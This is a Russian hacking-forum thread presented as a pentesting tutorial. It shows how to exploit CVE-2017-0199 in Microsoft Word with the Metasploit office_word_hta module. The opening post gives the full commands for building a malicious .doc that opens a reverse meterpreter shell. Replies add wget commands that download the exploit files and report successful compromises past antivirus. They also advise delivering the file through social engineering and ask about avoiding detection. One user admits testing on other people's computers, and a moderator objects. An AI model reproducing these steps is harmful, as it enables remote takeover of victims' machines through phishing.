ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   Доступ к удаленному хосту (Microsoft Word) (https://forum.antichat.xyz/showthread.php?t=559606)

Vander 11.05.2017 23:40

Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.

https://forum.antichat.xyz/attachmen...2af45444ed.png

Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.

OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.

OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.

Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.

Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы.

Начнем:

> use exploit/windows/fileformat/office_word_hta

> set srvhost 192.168.0.106

> set payload windows/meterpreter/reverse_tcp

> set filename order.doc

> set lhost 192.168.0.106

> exploit

https://forum.antichat.xyz/attachmen...7999c2e622.png


Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост:

https://forum.antichat.xyz/attachmen...da30e63055.png

Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter:

https://forum.antichat.xyz/attachmen...ff849693da.png

> sysinfo

https://forum.antichat.xyz/attachmen...fd5e8de6cc.png


На этом все, спасибо за внимание.

Vertigo 12.05.2017 20:36

Цитата:


CVlad сказал(а):

какие версии офиса подвержены данной уязвимости?


Уязвимость выстрелила как зеро-дэй. Речь шла о всех версиях. Так прошёл год )) Ждали от Майкрософта обновления с патчами.
11.04.2017 они действительно вышли и большей частью для МО 2016,2013,2010 г.
Но всё равно подозрительная тишина в отношении успеха.
Возможно ,пока к исчерпывающим ответам не готовы компании на рынке ИБ.
Кроме того, этого же числа , поддержка Win Vista должна быть прекращена по планам.
И это для поддерживаемых ОС,либо озадаченых обновлением пакета безопасности для МО.

XuliNam 12.05.2017 22:05

Цитата:


Oksy сказал(а):

Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать. Не кидайте тапками, только начинаю знакомство с эксплойтами и метасплойтом


да никто не кидает тапки)) ссылку доставь в контакте или еще как нить и убеди, что емц необходимо посмотреть этот документ)) короче изучай соц инженерию )

Vertigo 12.05.2017 22:05

Цитата:


Oksy сказал(а):

Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать.


Вам надо воспользоваться поиском по форуму,задать теги meterpreter , metasploit .
Очень много отличных статей вышло от наших известных авторов.Быстро изучить не получится,т.к инструмент
огромен по функционалу. Ссылка, как вариант , прилагается к письму и отсылается с рассчётом на прочтение.

ghostphisher 12.05.2017 22:25

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

https://packetstormsecurity.com/files/142281/office_word_hta.rb.txt

Но это не все, что бы не получить ошибку:
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

качаем:
wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf

стартуем, пробуем =)

ТС - респект за оперативный топик =)

XuliNam 12.05.2017 22:36

Цитата:


ghostphisher сказал(а):

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

***Скрытый текст***

ТС - респект за оперативный топик =)


Cпс ты как всегда спасаешь Parrot OS

ghostphisher 12.05.2017 23:12

Все работает

win7 SP1 Эннтерпрайз

XuliNam 13.05.2017 01:06

отлично прошлось по виндовс 10 при работающем авасте )) но при скачивании гугл Хром ругаеться, что фаил может быть плохой и навредит компу))
[doublepost=1494623166,1494620336][/doublepost]добавлю ) после открытия файла на вин10 ) на панели висит непонятный значек, который напрягает и привлекает внимание)

Vander 01.06.2017 20:22

Цитата:


jaguar сказал(а):

Failed to load module: exploit/windows/fileformat/office_word_hta
msf > и как загрузить модуль?


А версия metasploit какая?

Vander 01.06.2017 20:53

Цитата:


jaguar сказал(а):

metasploit v4.12.22-dev
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post
+ -- --=[ 455 payloads - 39 encoders - 8 nops
+ -- --=[ Free Metasploit Pro trial:


Стоит проапдейтить систему,

ghostphisher 03.06.2017 22:50

Цитата:


jaguar сказал(а):

тестирую на чужих компьютерах, как ползоваться vps? и как быть если палиться антивирусами?


Совсем не верный подход, и не только с точки зрения закона. Что бы понимать алгоритм срабатывания, стоит поставить виртуалку, с разными вариантами версий Win и пакета SP, постаивть разные версии АВ и от разных производителей, браузеры разные, и только так, потому что будет наглядно видно поведение всей ситуации.

Сергей Попов 04.06.2017 19:23

Цитата:


jaguar сказал(а):

а у люнекса есть дедик?


Коверканье названий вызывает личную неприязнь. На первый раз сдержался и не отправил в бан. Не уверен насчет второго раза.

Ondrik8 10.06.2017 23:08

Цитата:


Oksy сказал(а):

Помогите пожалуйста, не понимаю в чем дело.
Метасплоит говорит что сохранил зараженный файл с именем zakaz180.doc и указывает его местоположение.

Но такой папки ".msf4" в принципе нет у меня

Соответственно по ссылке скачивается файл default.hta
Хоть по нему и открывается сессия метерпретера, но это же совсем не Word.

Где мне искать обещанный метасплоитом файл zakaz180.doc?


.<---точка в переди названия файла означает что папка скрытая зайди в папку от рута (администратора) и увидишь ее тость курсор на папку правая кнопка мыши open with root

Ondrik8 11.06.2017 01:17

Цитата:


Oksy сказал(а):

Я итак под рутом всегда работаю. Нет там папки, или не понимаю как получить к ней доступ

это понятно...))) что в кали все под рутом работают! тогда пробуй так из под терминала в папке рут: cp . TAB -2раза> затем cd .msf4 и cp zakaz180.doc /root/Desktop

Ondrik8 11.06.2017 12:48

Цитата:


Oksy сказал(а):

Спасибо помогло. Выковыряла необходимый .doc файл.

Но сессия не запускается. Подскажите, может где ошибка у меня ?

На атакуемой машине запускается ворд. Win 7 *64. Offis 2013 вроде. Антивирус родной от майкрософт молчит.

Скрины с атакуемой машины:

Вы упустили пару моментов, читайте внимательно статью ТС-а

sosiskapi 25.06.2017 06:48

Цитата:


ghostphisher сказал(а):

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

***Скрытый текст***

Но это не все, что бы не получить ошибку:
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

качаем:
wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf

стартуем, пробуем =)

ТС - респект за оперативный топик =)


Не поиму почемуто то не видит эксплойт у меня. Все сделал как написано.

ghostphisher 25.06.2017 13:33

Цитата:


sosiskapi сказал(а):

Не поиму почемуто то не видит эксплойт у меня. Все сделал как написано.


Он уже есть давно в комплекте msf (если система обновлена), можно не качать.
Если не видит, значит где то ошибка - проверяем пути ( У СЕБЯ СВОИ ПУТИ, НАЗВАНИЕ ПАПОК )

sosiskapi 26.06.2017 05:38

Блин не заводиться у меня этот эксплойт. Он же должен запускать апачь?

ghostphisher 26.06.2017 12:31

Цитата:


sosiskapi сказал(а):

Блин не заводиться у меня этот эксплойт. Он же должен запускать апачь?


Подробнее про проблему, а скрины увеличат шанс решения ситуации =) Мб не верно по готовой ссылке идет переход?

Ondrik8 29.06.2017 18:25

VBad


tooris 14.08.2017 14:04

Хорошая статья, то что нужно для учебного фишинга

adm2 21.11.2017 19:46

Цитата:


posion1813 сказал(а):

кароучи, проблемка. если я прокинул порты, обязательно ли иметь постоянный ip адрес не в локалке? я чисто тренируюсь, мне не нужно постоянное соединение, чисто затестить. при пробросе портов, и указании внешнего ip адреса, не удается к нему привязаться. в чем может скрываться проблемма?


Чисто затестить лучше потренируйся в локалке) а так он тебе говорит что не может запустить листенер на этом айпи)
Для теста на внешку тебе и динамического будет достаточно.

adm2 23.11.2017 19:25

Цитата:


posion1813 сказал(а):

хм, в локалке все работает, мне затестить во внешке надо


С внешкой в тестовом режиме я делал как.
1 - пробрасывал порт на роутере
2 - хандлер в метасплоите указывал локальный ip
3 - генерировал нагрузку через Veil на внешний адрес. Может это и через метасплоит можно делать, но я пока не углублялся в него прям сильно) он у меня только слушает подключения и используется, в основном, для пост эксплуатации) ибо такое кол-во модулей не так быстро поддаются изучению

adm2 26.11.2017 16:30

Цитата:


posion1813 сказал(а):

было бы все так просто у меня. я на роутере порты пробросил, но они чот не работают. просто любые сканеры показывают что порт закрыт, соединения тож нету. хотя делал все правильно


Если сомневаешься, правильно ли всё сделал, то можешь попробовать самое примитивное: это открыть 80 порт, запустить апач, пробросить 80 порт, и проверить с 4G с телефона открыть страницу) если откроется, значит все делал правильно.
Ибо сканеры, сканерами, а когда воочию увидишь запущенный на внешку веб сервер то оцениваешь это по другому)

crestfo 26.11.2017 18:40

Пробивается и windows 10 и vm windows 7

https://forum.antichat.xyz/attachmen...395b48c965.png

sk3l 28.11.2017 21:16

какой fud?

Ondrik8 03.12.2017 18:54

Цитата:


posion1813 сказал(а):

кстати, вот в localhost я указываю свой внешний ip, а в srvhost что указывать? внешний? внутренний?

и не заработает)) Такая инфа Бро лежит под лютым хайдом каждый матерый знает как это сделать, но никто хочет и не будет выкладывать все в паблик.. простой способ покупай себе VPS с внешним IP и будет тебе счастье..)

Ondrik8 03.12.2017 21:01

Цитата:


posion1813 сказал(а):

это трололо?)) ну а если серьезно, в лакалке я указываю ток свой ip, и там и там


не в коем случае не тролю никого я из этого вырос, хотя могу! Указываешь, а толку если инет его не видит, как сам видишь по портам..

Lisenok 10.04.2018 17:55

Протестировал в термуксе,сессия прилетела ,нод не отреагировал, хром тоже спокойно файлу дал загрузится)


Время: 07:21